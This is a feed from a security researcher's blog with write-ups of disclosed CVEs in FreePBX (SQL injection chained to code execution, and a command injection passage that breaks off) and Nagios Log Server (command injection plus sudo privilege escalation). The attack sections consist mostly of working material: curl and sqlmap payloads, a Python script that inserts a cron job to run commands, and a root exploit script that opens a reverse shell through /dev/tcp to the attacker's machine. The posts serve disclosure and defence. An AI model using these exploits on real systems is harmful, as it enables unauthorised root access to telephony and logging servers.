Jekyll2026-03-05T01:20:40+00:00https://theyhack.me/feed.xmltheyhack.meinfosec, hacking, writeups, etc...M. Cory BillingtonCVE-2025-67736 FreePBX Authenticated SQL Injection leads to RCE2026-02-07T00:00:00+00:002026-02-07T00:00:00+00:00https://theyhack.me/CVE-2025-67736-FreePBX-Authenticated-SQL-InjectionOverview

This will be fairly straight to the point since it’s another FreePBX vulnerability. It’s an authenticated SQLi, so not the end of the world as you’d need admin access, but it was a cool way to access a technique watchTowr blogged about to add a cron job to the freepbx database and get RCE.

Same as last time, easy reporting process through their security-reporting page.

Technical details

After authenticating to the FreePBX Administration GUI, the tts module is reachable using a request to:

http://<freepbx-host-or-ip>/admin/config.php?display=tts&view=form&id=

The base page for the tts plugin when accessed through the administrative control panel is defined in page.tts.php here. The important functionality is defined on line 38 here:

if(isset($_GET['view']) && $_GET['view'] == 'form'){
	if (!empty($_GET['id']) || $action !== 'delete') {
		$tts = tts_get($_REQUEST['id'] ?? '');
		foreach ($tts as $key => $value) {
			$data[$key] = $value;
		}
	}
	show_view(__DIR__ . '/views/tts.php', $data);
}else{
	show_view(__DIR__ . '/views/grid.php', $data);
}

This loop checks for the HTTP GET request parameter view to be defined, and for it to be set to the value of form. If view=form, next the logic checks to see if the GET parameter id is set, and for $action to not be set to delete. If both of those conditions are met, the id parameter is then passed to the function tts_get(), which is defined in functions.inc.php on line 69 here:

function tts_get($p_id) {
	global $db;

	$sql = "SELECT id, name, text, goto, engine FROM tts WHERE id=$p_id";
	return $db->getRow($sql, DB_FETCHMODE_ASSOC);
}

The id value set via HTTP GET request is passed into this function via the $p_id parameter. The vulnerability is on line 72 where the $p_id parameter is formatted into a defined SQL query with no checking, escaping, parameterizing, or typing. This query is then passed to the getRow() function on the next line where it is executed against the database.

This is fairly easy to demonstrate with a simple curl request as you can see the response time increase as the SLEEP() value is increased:

$ time curl --cookie /tmp/cookie -s -XPOST --header 'Content-Type: application/x-www-form-urlencoded' --data 'username=admin&password=ch[REDACTED]az'  http://192.168.1.115/admin/config.php -o /dev/null --next --cookie /tmp/cookie -s 'http://192.168.1.115/admin/config.php?display=tts&view=form&id=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(2)))test)' -o /dev/null

real	0m3.799s
user	0m0.006s
sys	0m0.005s
$ time curl --cookie /tmp/cookie -s -XPOST --header 'Content-Type: application/x-www-form-urlencoded' --data 'username=admin&password=ch[REDACTED]az'  http://192.168.1.115/admin/config.php -o /dev/null --next --cookie /tmp/cookie -s 'http://192.168.1.115/admin/config.php?display=tts&view=form&id=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(5)))test)' -o /dev/null

real	0m6.840s
user	0m0.003s
sys	0m0.007s

sqlmap also discovers this easily with a command such as:

sqlmap -u 'http://192.168.1.115/admin/config.php?display=tts&view=form&id=1' -H 'Cookie: PHPSESSID=vb2f[REDACTED]2tri;' -p id --level 3 --risk 2 --dbms=mysql --banner --current-user --current-db --flush-session --fresh-queries --proxy http://127.0.0.1:8080

Chaining SQLi to Remote Code Execution

[ Disclaimer: use this stuff at your own risk. Personally, I treat anything other than SELECT statements as playing with fire, and take extra care when using them outside of a lab environemnt. ]

I confirmed the attack path documented in watchTowr’s blog post also works here. You can leverage sqlmap to do this with the --sql-query functionality with a query such as this:

--sql-query="INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','rcejob','id > /tmp/rceproof',NULL,'* * * * *',30,1,1)"

I would recommend watching the cron_jobs table while you test on the server with something like:

root@debian-server:~# mysql -uroot -e 'use asterisk;select * from cron_jobs;'

And you should see a new row such as the following show up:

root@debian-server:~# mysql -uroot -e 'use asterisk;select * from cron_jobs;'
+----+----------------------+-----------------------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------+--------------+-------------+---------+-----------------+
| id | modulename           | jobname                           | command                                                                                                                       | class                                   | schedule     | max_runtime | enabled | execution_order |
+----+----------------------+-----------------------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------+--------------+-------------+---------+-----------------+
...Omitted...
| 42 | sysadmin             | rcejob                            | id > /tmp/rcetest                                                                                                             | NULL                                    | * * * * *    |          30 |       1 |               1 |
+----+----------------------+-----------------------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------+--------------+-------------+---------+-----------------+

I also wrote a quick python script that handles authentication and the injection to create a cron job. Example usage:

$ python3 Documents/exploit.py http://192.168.1.115 admin ch[REDACTED]az 'id > /tmp/rcetest'
[+] Login success!
[*] Sending SQLi payload to create cron job to execute 'id > /tmp/rcetest'
[*] SQLi should have worked. Cron schedule is '* * * * *' so it may be a minute to execute

exploit.py source:

import requests
import sys

## Usage
# $ python3 Documents/exploit.py http://192.168.1.115 admin ch[REDACTED]az 'id > /tmp/rcetest'
# [+] Login success!
# [*] Sending SQLi payload to create cron job to execute 'id > /tmp/rcetest'
# [*] SQLi should have worked. Cron schedule is '* * * * *' so it may be a minute to execute

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
cmd = sys.argv[4]

url = f"{url}/admin/config.php"

## Insert statement parameters hex encoded to avoid single quotes
modulename = 'sysadmin'.encode().hex()
jobname = 'rcejob'.encode().hex()
command = cmd.encode().hex()
schedule = '* * * * *'

## injection payload to create cron job
sqli_payload = f'1;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES (0x{modulename},0x{jobname},0x{command},NULL,0x{schedule.encode().hex()},30,1,1)#'

proxies = dict.fromkeys(['http', 'https'], 'http://127.0.0.1:8080')

with requests.Session() as s:
    s.verify = False

    ## Comment out if you don't want to proxy traffic through burp/etc
    s.proxies.update(proxies)

    login_payload = {
        "username": username,
        "password": password
    }

    login_res = s.post(url, data=login_payload)

    if 'Invalid Username or Password' in login_res.text:
        print(f"[-] Invalid username or password")
        exit()
    
    print(f"[+] Login success!")
    print(f"[*] Sending SQLi payload to create cron job to execute '{cmd}'")

    params = {
        "display": "tts",
        "view": "form",
        "id": sqli_payload
    }

    sqli_res = s.get(url, params=params)
    if sqli_res.status_code == 500:
        print(f"[*] SQLi should have worked. Cron schedule is '{schedule}' so it may be a minute to execute")

Upon running the script, it may take a moment for the cron job to execute.

References:

  • [GitHub advisory] Authenticated SQL Injection in FreePBX tts (Text To Speech) module
    • https://github.com/FreePBX/security-reporting/security/advisories/GHSA-632c-49p9-x7cw
]]>M. Cory BillingtonCVE-2025-34322 and CVE-2025-34323 - Rooting Nagios Log Server with AI! Just kidding, not really… Just an AI adjacent command injection.2025-11-25T00:00:00+00:002025-11-25T00:00:00+00:00https://theyhack.me/Rooting-Nagios-Log-ServerOverview

I did a quick glance over Nagios Log server a couple months ago and wanted to share two vulnerabilities I reported. The authenticated command injection is kinda fun as it was in some AI functionality added in via a python script, and then the privilege escalation was due to some directory permissions that allow you to control a file that executes as root via sudo.

Authenticated Command Injection

Nagios Log Server is vulnerable to an authenticated command injection vulnerability in the Natural Language Queries experimental functionality. This functionality appears to enable various Large Language Models to assist in log file queries/interpretation. This appears to be accomplished using a python script that is invoked via shell_exec(). To enable this functionality, a selection is made within the Global Settings and, depending on which selection, various inputs are requested such as an API key, server IP/hostname, and port. These values are not checked for special characters. When leveraging the Natural Language Queries functionality via /nagioslogserver/dashboard/natural_language_to_query endpoint, these values pulled from the running configuration and leveraged in a formatted string without being escaped or checked, which is then passed to shell_exec(). This results in shell command execution as the www-data user.

Privilege escalation

The www-data user can execute various commands and scripts as root without a password. Three of these scripts are located within a directory where the www-data has write access by way of being in the nagios user group. This group has write access, therefore they can move (not modify) files owned by root and create new files within the directory. Therefore, the www-data user can move files that the www-data user has sudo execution rights as to another name (example would be mv reconfigure_ncpa.sh reconfigure_ncpa.sh.bak), and then create any arbitrary file in its place, allowing the www-data user to execute the new file containing arbitrary commands as the root user.

Technical Details

1. Authenticated Command Injection in Natural Language Queries in Nagios Log Server

The Natural Language Queries is a Experimental Features that can be located under the Global Settings section. To stay focused on the vulnerable code, we will focus on the vulnerability sink below, and then discuss from there how the settings play into this vulnerability.

To perform a query using Natural Language Queries after it is enabled, users would make the following request:

  • http://<nagios-logserver-url>/nagioslogserver/dashboard/natural_language_to_query?query=doesntmatter

This can be observed in the code base as:

  • http://<nagios-logserver-url>/nagioslogserver/<controller>/<public-function>?query=doesntmatter

Controllers are located at the following path:

  • /var/www/html/nagioslogserver/application/controllers/

Below, we can follow what happens when this URL is requested:

# cat /var/www/html/nagioslogserver/application/controllers/Dashboard.php -n
     1	<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');
     2	
     3	class Dashboard extends LS_Controller
     4	{
     5	    private $offset = 0;
     6	
     7	    function __construct()
     8	    {
     9	        parent::__construct();
    10	
    11	        // Make sure that user is authenticated no matter what page they are on
    12	        require_install();
...Omitted for brevity...
   390	
   391	    public function natural_language_to_query() {
   392	        $input = isset($_GET['input']) ? $_GET['input'] : '';
   393	        $input = escapeshellarg($input);
   394	        $current_fields = isset($_GET['current_fields']) ? $_GET['current_fields'] : '';
   395	        $current_fields = escapeshellarg($current_fields);
   396	    
   397	        $api_key = trim(get_option("ai_api_key"));
   398	        $model = trim(get_option("ai_provider"));
   399	        $self_host_ip_address = trim(get_option("self_host_ip_address"));
   400	        $self_host_port = trim(get_option("ai_port"));
   401	        
   402	        $script =  '/usr/local/nagioslogserver/scripts/generate_log_query.py';
   403	    
   404	        if ($model == "self_hosted") {
   405	            $command = "python3.9 $script --model \"$model\" --provider_address \"$self_host_ip_address\" --provider_port \"$self_host_port\" --natural_language_query \"$input\" --current_fields \"$current_fields\"";
   406	        } else {
   407	            $command = "python3.9 $script --api_key \"$api_key\" --model \"$model\" --natural_language_query \"$input\" --current_fields \"$current_fields\"";
   408	        }
   409	    
   410	        $output = shell_exec($command);

In the code above, the function natural_language_to_query() is invoked when http://<nagios-logserver-url>/nagioslogserver/dashboard/natural_language_to_query is requested. We can see $input is set via an HTTP GET parameter. It is then escaped using the PHP function escapeshellarg(), therefore that is likely not going to be vulnerable to command injection, though argument injection in the generate_log_query.py is a possibility. We won’t be exploring that here though.

The exact same logic is true for the next two lines with the $current_fields parameter.

The interesting part starts with these lines of code:

   397	        $api_key = trim(get_option("ai_api_key"));
   398	        $model = trim(get_option("ai_provider"));
   399	        $self_host_ip_address = trim(get_option("self_host_ip_address"));
   400	        $self_host_port = trim(get_option("ai_port"));

After those values are pulled from the configuration using the get_option(), the $script variable is set to a python script /usr/local/nagioslogserver/scripts/generate_log_query.py.

Finally, we reach the sink. We use a self-hosted AI model self_hosted (there does not actually need to be one) which creates the following command string:

$command = "python3.9 $script --model \"$model\" --provider_address \"$self_host_ip_address\" --provider_port \"$self_host_port\" --natural_language_query \"$input\" --current_fields \"$current_fields\"";

This command string is passed to shell_exec() which executes the command.

Each of the parameters can be injected into using command substitution such as:

`id`

However, in order to inject into these parameters, we need to do so by setting configuration values in the Global Settings page. So, this exploit requires two requests:

  1. Set the configuration values
  2. Make the request to invoke the Natural Language query

The first, injecting a command into self_hosted will look like:

$ curl -isk -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=3pap795eohmorm726nsnasvsgc1as9ou' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`id>/var/www/html/nagioslogserver/www/scripts/test.txt`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals --proxy http://127.0.0.1:8080
HTTP/1.1 200 OK
Date: Sun, 07 Sep 2025 15:53:22 GMT
Server: Apache/2.4.65 (Debian)
Set-Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; expires=Sun, 07 Sep 2025 17:53:22 GMT; Max-Age=7200; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 96046

<!DOCTYPE html><!--[if lt IE 7]>
<html class="no-js lt-ie9 lt-ie8 lt-ie7">
<![endif]--><!--[if IE 7]>
<html class="no-js lt-ie9 lt-ie8">
...Omitted for brevity...

It’s important to note, this can easily be accomplished via the dashboard as well at http://<nagios-logserver-url>/nagioslogserver/admin/globals. One would just enter the injected command:

`id>/var/www/html/nagioslogserver/www/scripts/test.txt`

into the Server Address field and then save. This is true for any of the fields.

Next, invoking the Natural Language Query will look like:

$ curl -isk -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=3pap795eohmorm726nsnasvsgc1as9ou' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query --proxy http://127.0.0.1:8080
HTTP/1.1 200 OK
Date: Sun, 07 Sep 2025 15:59:44 GMT
Server: Apache/2.4.65 (Debian)
Set-Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; expires=Sun, 07 Sep 2025 17:59:44 GMT; Max-Age=7200; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 67
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json

{"query":"Error: Model self_hosted not supported.","is_valid":true}

This request is what executes the injected command. We can ignore the error as it still executes. Because we redirected output to /var/www/html/nagioslogserver/www/scripts/test.txt, we can retrieve the output without authentication with the following curl command:

$ curl -sk http://192.168.122.198/nagioslogserver/scripts/test.txt
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios)

We can see successful command execution as the www-data user, with an interesting note that the www-data user is a member of the nagios group. More on that in the next section.

Python script for this exploit available here: CVE-2025-34322.txt

2. Privilege Escalation via sudo rules with group writable directory

Using the previous command injection, we can enumerate sudo rules that can be run without a password as the www-data user:

$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=3pap795eohmorm726nsnasvsgc1as9ou' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`sudo -l>/var/www/html/nagioslogserver/www/scripts/test.txt`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals --proxy http://127.0.0.1:8080 -o /dev/null
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=3pap795eohmorm726nsnasvsgc1as9ou' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query --proxy http://127.0.0.1:8080 -o /dev/null
$ curl -sk http://192.168.122.198/nagioslogserver/scripts/test.txt
Matching Defaults entries for www-data on debian-nagios-logserver2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on debian-nagios-logserver2:
    (root) NOPASSWD: /etc/init.d/logstash start
    (root) NOPASSWD: /etc/init.d/logstash stop
    (root) NOPASSWD: /etc/init.d/logstash restart
    (root) NOPASSWD: /etc/init.d/logstash reload
    (root) NOPASSWD: /etc/init.d/logstash status
    (root) NOPASSWD: /etc/init.d/opensearch start
    (root) NOPASSWD: /etc/init.d/opensearch stop
    (root) NOPASSWD: /etc/init.d/opensearch restart
    (root) NOPASSWD: /etc/init.d/opensearch reload
    (root) NOPASSWD: /etc/init.d/opensearch status
    (root) NOPASSWD: /usr/bin/systemctl start opensearch
    (root) NOPASSWD: /usr/bin/systemctl stop opensearch
    (root) NOPASSWD: /usr/bin/systemctl restart opensearch
    (root) NOPASSWD: /usr/bin/systemctl reload opensearch
    (root) NOPASSWD: /usr/bin/systemctl status opensearch
    (root) NOPASSWD: /usr/bin/systemctl start logstash
    (root) NOPASSWD: /usr/bin/systemctl stop logstash
    (root) NOPASSWD: /usr/bin/systemctl restart logstash
    (root) NOPASSWD: /usr/bin/systemctl reload logstash
    (root) NOPASSWD: /usr/bin/systemctl status logstash
    (root) NOPASSWD: /usr/bin/systemctl start httpd
    (root) NOPASSWD: /usr/bin/systemctl stop httpd
    (root) NOPASSWD: /usr/bin/systemctl restart httpd
    (root) NOPASSWD: /usr/bin/systemctl reload httpd
    (root) NOPASSWD: /usr/bin/systemctl status httpd
    (nagios) NOPASSWD: /usr/local/nagioslogserver/logstash/bin/logstash
    (root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
    (root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
    (root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh
    (root) NOPASSWD: /etc/init.d/ncpa start
    (root) NOPASSWD: /etc/init.d/ncpa stop
    (root) NOPASSWD: /etc/init.d/ncpa restart
    (root) NOPASSWD: /etc/init.d/ncpa reload
    (root) NOPASSWD: /etc/init.d/ncpa status
    (root) NOPASSWD: /usr/bin/systemctl start ncpa
    (root) NOPASSWD: /usr/bin/systemctl stop ncpa
    (root) NOPASSWD: /usr/bin/systemctl restart ncpa
    (root) NOPASSWD: /usr/bin/systemctl reload ncpa
    (root) NOPASSWD: /usr/bin/systemctl status ncpa
    (root) NOPASSWD: /usr/bin/ln -s /etc/openldap/cacerts/*
        /etc/pki/ca-trust/source/anchors/
    (root) NOPASSWD: /usr/bin/ln -s /etc/ldap/certs/*
        /usr/local/share/ca-certificates
    (root) NOPASSWD: /usr/bin/update-ca-trust extract
    (root) NOPASSWD: /usr/bin/update-ca-trust enable
    (root) NOPASSWD: /usr/bin/update-ca-certificates
    (root) NOPASSWD: /usr/sbin/update-ca-certificates

These three seem interesting:

    (root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
    (root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
    (root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh

By checking the /usr/local/nagioslogserver/scripts directory permissions, we observe that any nagios group member has write access to this directory:

# sudo -u www-data bash
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ cd ..
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ pwd
/usr/local/nagioslogserver
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios   4.0K Sep  7 16:34 .
drwxr-xr-x 12 root   root     4.0K Sep  7 16:29 ..
drwxrwxr-x  4 nagios nagios   4.0K Sep  7 16:20 etc
-rw-r--r--  1 root   root        0 Sep  7 16:34 .installed
drwxr-xr-x 14 nagios nagios   4.0K Sep  7 16:29 logstash
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:20 mibs
drwxr-xr-x 12 nagios nagios   4.0K Sep  7 16:20 opensearch
drwxrwxr-x  5 nagios nagios   4.0K Sep  7 16:20 pythonvenv
drwxrwxr-x  3 nagios nagios   4.0K Sep  7 16:20 scripts
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:36 snapshots
drwxrwxr-x  3 nagios www-data 4.0K Sep  7 16:36 tmp
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:31 var

Write access to this directory means that members of this group can move files inside this directory even if they do not have write access to the file itself. For example, if we list out files in this directory:

$ ls -lah
total 138M
drwxrwxr-x  3 nagios nagios 4.0K Sep  7 16:20 .
drwxrwxr-x 11 nagios nagios 4.0K Sep  7 16:34 ..
-r-xr-xr--  1 root   root   2.4K Sep  7 16:20 change_timezone.sh
-r-xr-xr--  1 nagios nagios 5.1K Sep  7 16:20 check_ai_key.sh
-r-xr-xr--  1 nagios nagios 2.3K Sep  7 16:20 create_backup.sh
-r-xr-xr--  1 nagios nagios 3.8K Sep  7 16:20 dump_index.php
-r-xr-xr--  1 nagios nagios 137M Sep  7 16:20 elasticdump
dr-xr-xr--  2 nagios nagios 4.0K Sep  7 16:20 esdump
-r-xr-xr--  1 nagios nagios 8.3K Sep  7 16:20 generate_log_query.py
-r-xr-xr--  1 nagios nagios 1.2K Sep  7 16:20 generate_uuid.sh
-r-xr-xr--  1 nagios nagios 2.1K Sep  7 16:20 get_es_config.php
-r-xr-xr--  1 nagios nagios  722 Sep  7 16:20 get_logstash_config.php
-r-xr-xr--  1 root   root     85 Sep  7 16:20 get_logstash_ports.sh
-r-xr-xr--  1 nagios nagios 2.4K Sep  7 16:20 index_data_helper.php
-r-xr-xr--  1 nagios nagios  33K Sep  7 16:20 migrate_data.php
-r-xr-xr--  1 root   root    87K Sep  7 16:20 profile.sh
-r-xr-xr--  1 nagios nagios 1.5K Sep  7 16:20 reconfigure_ncpa.php
-r-xr-xr--  1 root   root    316 Sep  7 16:20 reconfigure_ncpa.sh
-r-xr-xr--  1 nagios nagios 1.9K Sep  7 16:20 reset_nagiosadmin_password.sh
-r-xr-xr--  1 nagios nagios 4.1K Sep  7 16:20 restore_backup.sh
-r-xr-xr--  1 nagios nagios  50K Sep  7 16:20 xi_api_create_passive_objects.php

The files that www-data has permission to execute as root via sudo are all owed by root. www-data can move the reconfigure_ncpa.sh to any other filename and then create a new reconfigure_ncpa.sh file, set the executable bit, and then run as root via sudo.

Writing to the file clearly does not work as www-data as shown by the first line of output, however moving and recreating a new file does:

root@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts# sudo -u www-data bash
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ echo 'id' >> reconfigure_ncpa.sh 
bash: reconfigure_ncpa.sh: Permission denied
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ mv reconfigure_ncpa.sh reconfigure_ncpa.sh.bak
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ echo 'id' >> reconfigure_ncpa.sh 
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ chmod +x reconfigure_ncpa.sh
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh
uid=0(root) gid=0(root) groups=0(root)
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver/scripts$ cat reconfigure_ncpa.sh
id

Proof of Concept

Combining these, we can use the following script to exploit the command injection, perform the file move operations, and then execute the new file via sudo to get a reverse shell as root:

First, start a nc listener in a separate terminal window:

$ nc -nlvp 1234
listening on [any] 1234 ...

Next, get the local IP address of your testing machine, ours is 192.168.122.216.

Finally, leverage the proof of concept below to execute a reverse shell back to your testing machine as the root user:

$ python3 root_exploit.py http://192.168.122.198/ nagiosadmin password123 192.168.122.216 1234
[+] Login worked, adding command injection to self_host_ip_address
[*] Triggering command with request to natural language query endpoint http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query

And observe a reverse shell connecting back to the separate terminal window:

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.122.216] from (UNKNOWN) [192.168.122.198] 50260
bash: cannot set terminal process group (23645): Inappropriate ioctl for device
bash: no job control in this shell
root@debian-nagios-logserver2:/var/www/html/nagioslogserver/www# id
id
uid=0(root) gid=0(root) groups=0(root)

root_exploit.py contents:

import requests
import sys
import base64

## Usage
# $ python3 root_exploit.py <nagios-logserver-url> <username> <password> <local-ip> <local-port>

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
local_ip = sys.argv[4]
local_port = sys.argv[5]

proxies = dict.fromkeys(['http','https'],'http://127.0.0.1:8080')

login_url = f'{host}nagioslogserver/login'
globals_setting_url = f'{host}nagioslogserver/admin/globals'
nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query'
get_output = f'{host}nagioslogserver/scripts/test.txt'

# reverse shell, can replace with any command Ex: `id>/var/www/html/nagioslogserver/www/scripts/test.txt` if you just want to see `root` run a command and get the output from the webserver
## `nc -nlvp <local_port>` to listen for incoming connection

root_command = f"""bash -c '(bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1)&';
cp /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chown root:root /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh"""
root_command_b64 = base64.b64encode(root_command.encode()).decode()

privesc_shell_script = f"""mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '{root_command_b64}' |base64 -d > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
"""

base64_cmd = base64.b64encode(privesc_shell_script.encode()).decode()

cmd = f"echo {base64_cmd}|base64 -d|bash"


with requests.Session() as s:
    s.proxies.update(proxies)
    s.verify = False

    csrf_req = s.get(login_url)
    csrf_ls = csrf_req.cookies['csrf_ls']
    
    login_payload = {
        'csrf_ls': csrf_ls,
        'username': username,
        'password': password
    }
    login_req = s.post(login_url, data=login_payload, allow_redirects=False)
    if 'ls_session' not in login_req.cookies:
        print("[-] Incorrect credentials")
        exit()
    
    print(f"[+] Login worked, adding command injection to self_host_ip_address")


    cmd_injection_payload = {
        "csrf_ls": csrf_ls,
        "natural_language_query": 1,
        "nlp_disclaimer": "on",
        "ai_provider": "self_hosted",
        "self_host_ip_address": f"`{cmd}`",
        "ai_port": 8000,
        "saveglobals":1
    }
    cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload)

    if not cmd_injection_res.ok:
        print(f"[-] Cmd injection probably didn't work")
        exit()
    if cmd not in cmd_injection_res.text:
        print(f"[*] Command didn't show up in the response text, still check if it works...")
    
    print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}")

    nlq_res = s.get(nlq_url)

    if not nlq_res.ok:
        print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output")

Also available here: root_exploit.txt

All exploits also available in this repository:

https://github.com/mcorybillington/CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server

Advisories:

CVEs requested by VulnCheck

  • https://www.vulncheck.com/advisories/nagios-log-server-authenticated-command-injection-via-natural-language-queries
  • https://www.vulncheck.com/advisories/nagios-log-server-local-privilege-escalation-via-writable-scripts-and-sudo-rules
  • https://www.nagios.com/changelog/nagios-log-server/nagios-log-server-2026r1-0-1/
]]>M. Cory BillingtonCVE-2025-64328 FreePBX Authenticated Command Injection2025-11-08T00:00:00+00:002025-11-08T00:00:00+00:00https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-InjectionOverview

I recently decided to take a look at FreePBX after reading watchTowr’s awesome blog post detailing an auth bypass -> SQLi -> RCE. As I read it, I saw that the project was:

  • Open source ✅
  • PHP ✅

you sob, i'm in

* fwiw i’m not a ‘omg php is so insecure!!!1!’, i just enjoy auditing php projects. extensively learn whatever you are comfortable using and you’ll probably end up with a pretty secure app.

So, I installed it and started poking around at a few different functions, and then eventually landed on an authenticated command injection in the administrative control panel. The project has pretty extensive controls that can be used to restrict access to this interface, so it wasn’t exactly a “sky is falling” vuln like watchTowr disclosed, but the interesting thing I noticed is that all the user needed was access to authenticate to the interface. They didn’t need any authorization to anything in particular once they were in.

In this post I’ll include a basic proof of concept as well as a nuclei template for detecting this. The official published advisory is available here:

  • https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw

This was my first time working through a disclosure via Github’s security policy in a project. I have to say it is pretty neat/easy. FreePBX was really easy to work with as well through the policy. I’m a fan.

Technical details

After authenticating to the FreePBX Administration GUI, the framework module and testconnection command are reachable via a request to:

http://<freepbx-host-or-ip>/admin/ajax.php?module=filestore&command=testconnection

This logic is defined in Filestore.class.php on line 167 here:

public function ajaxHandler(){
	switch($_REQUEST['command']) {
		case 'grid':
			return $this->listItems($_REQUEST['driver'], true);
		break;
		case 'testconnection':
			$result = "";
			$driver = basename($_REQUEST['driver']);
			include("drivers/$driver/testconnection.php");
			if($driver == "FTP") {
				if($_REQUEST['usesftp'] == "yes") {
					$result = check_sftp_connect($_REQUEST['host'], $_REQUEST['port'], $_REQUEST['timeout'], $_REQUEST['user'], $_REQUEST['password'], $_REQUEST['path']);
				}
				else {
					$result = check_ftp_connect($_REQUEST['host'], $_REQUEST['port'], $_REQUEST['timeout'], $_REQUEST['usetls'], $_REQUEST['user'], $_REQUEST['password'], $_REQUEST['path'], $_REQUEST['transfer']);
				}
			}
			elseif($driver == "Dropbox") {
				$result = check_dropbox_connect($_REQUEST['token'], $_REQUEST['path']);
			}
			elseif($driver == "SSH") {
				$result = check_ssh_connect($_REQUEST['host'], $_REQUEST['port'], $_REQUEST['user'], $_REQUEST['key'], $_REQUEST['path']);
			}

By specifying testconnection via the command HTTP GET parameter, this causes the logic to execute the statements from lines 168-190. Because this vulnerability is in the SSH portion, the HTTP Request variable, assigned to $driver on line 169 needs to be set to SSH. When driver=SSH, the condition on line 182 will be met and the check_ssh_connect() function will be called.

check_ssh_connect() is defined in testconnection.php on line 2 here:

function check_ssh_connect($host, $port, $user, $key, $path) {
	$keypath = dirname($key);
	$publickey = "$key.pub";
	if(!is_dir($keypath)) {
		exec("mkdir -p $keypath");
	}
	if(!file_exists($key)) {
		exec("ssh-keygen -t ecdsa -b 521 -f $key -N \"\" && chown asterisk:asterisk $key && chmod 600 $key");
	}

The check_ssh_connect() accepts five HTTP request variables: host, port, user, key, and path. All of them must be present otherwise an exception will be thrown.

The $key variable is what we will focus on, though others are vulnerable as well.

$key is leveraged to create a directory name via the dirname() method, which is saved in $keypath. This value is used without being checked in the exec("mkdir -p $keypath"); function so long as the $keypath value is not an existing directory. We can inject values into this so long as there is a / and some text after, example below:

# php -r 'echo dirname("`<thisisacommand>`/anything");'
`<thisisacommand>`

This is the first sink, which will execute something like this on the system (output is courtesty of one of my favorite tools pspy):

